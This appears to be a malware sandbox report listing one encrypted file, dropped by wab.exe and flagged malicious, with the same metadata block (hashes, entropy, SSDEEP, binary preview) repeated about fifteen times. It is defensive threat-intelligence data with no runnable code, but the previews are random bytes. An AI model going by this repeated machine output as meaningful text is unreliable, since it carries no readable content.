                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
